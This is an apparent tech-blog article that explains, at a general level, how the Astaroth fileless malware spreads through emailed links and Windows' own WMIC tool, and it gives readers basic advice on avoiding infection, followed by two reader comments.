Microsoft Warns of Hard-to-Spot Fileless Malware, “Astaroth”

Astaroth Featured

Recently, Microsoft went into red alert after Windows came under attack from malware. The antagonist this time was a strain of fileless malware called Astaroth. We’ve covered fileless malware in the past, so be sure to study up if you’re not sure what that means. In essence, it’s when malware lives within the RAM of a computer rather than its filesystem, making it harder to detect.

Let’s explore why Microsoft is up in arms about Astaroth, as well as what you should do to protect yourself.

How Does Astaroth Spread?

Astaroth Email

Astaroth manages to get around by using an .LNK file. This file is uploaded to a website, then a link to the website is sent around in an email.

If someone clicks the link, it activates the .LNK file to run in Windows. This sends some instructions to the Windows Management Instrumentation Command-line (WMIC) tool. This is a genuine program within Windows itself, so it skirts under the antivirus during execution.

Astaroth then uses its guise under WMIC to force it to download and run all the programs that Astaroth needs to do its job. Once it has fully assembled the malware, the attack goes off.

While the Astaroth does download tools to do its job, they’re all legitimate system tools that Windows uses natively. As such, it makes it harder for an antivirus to detect it, as the attack uses key Windows processes against itself. This is why it’s called a “fileless” attack, as no foreign files are being downloaded and saved.

This method of attack also has a larger category assigned to it: a “Living-off-the-Land” attack. This is because the virus isn’t technically introducing any new agents into the system; it’s simply using what is already there to download and execute the payload.

What Does Astaroth Do?

Astaroth Grief

Astaroth’s main goal is to harvest as much information as it can. It performs this through several attack vectors. A keylogger tracks everything the user is typing, while the clipboard is scanned for sensitive information. Astaroth will also force apps to dump information about themselves.

This is generally how most malware acts these days. Viruses and malware have moved away from doing damage and instead choose to perform actions that either harvest data or make money for the developers. Astaroth is a severe example of this, as its fileless installation and multiple detection methods make it a force to be reckoned with.

How to Avoid this Attack

Astaroth Shield

Fortunately, while this tactic makes it hard for an antivirus to pick up on the attack, the actual initial vector is easy to spot by human eyes. Always be careful with links that you click in emails, especially ones sent from people who you’ve never heard from before.

Fileless Foes

The stealthy nature of fileless malware makes them a serious threat, even for people with antiviruses installed. The latest Astaroth wave has shown just how devastating fileless malware can get. Now you know what it is, what it can do, and how to avoid an infection.

Does fileless malware worry you? Let us know below.

The Complete Windows 10 Customization Guide

The Complete Windows 10 Customization Guide

In this ebook we’ll be exploring the multitude of options to fully customize Windows 10. By the end of this ebook you’ll know how to make Windows 10 your own and become an expert Windows 10 user.

Get it now! More ebooks »

2 comments

  1. As Forrest Gump said “Stupid is as stupid does”. How many times do people have to be told and shown that clicking willy-nilly on links in emails from senders they do not recognize is dangerous to the health of their computer???!!! If users used their heads for something other than a hat rack and practiced safe computing, most malware would die on the vine or spread ineffectively.

    Yes, the hackers that develop malware should be strung up by their toes but the inveterate, mindless clickers should join them by being strung up by their thumbs (or whatever digit they use to click their mouse).

    1. Just like @dragonmouth said, which is exactly what i keep telling to ppl around me (but keep ignoring me), until they find themselves in such a situation and call me to unstuck them from the “mud” they got into because of their arrogance.

Leave a Comment

Yeah! You've decided to leave a comment. That's fantastic! Check out our comment policy here. Let's have a personal and meaningful conversation.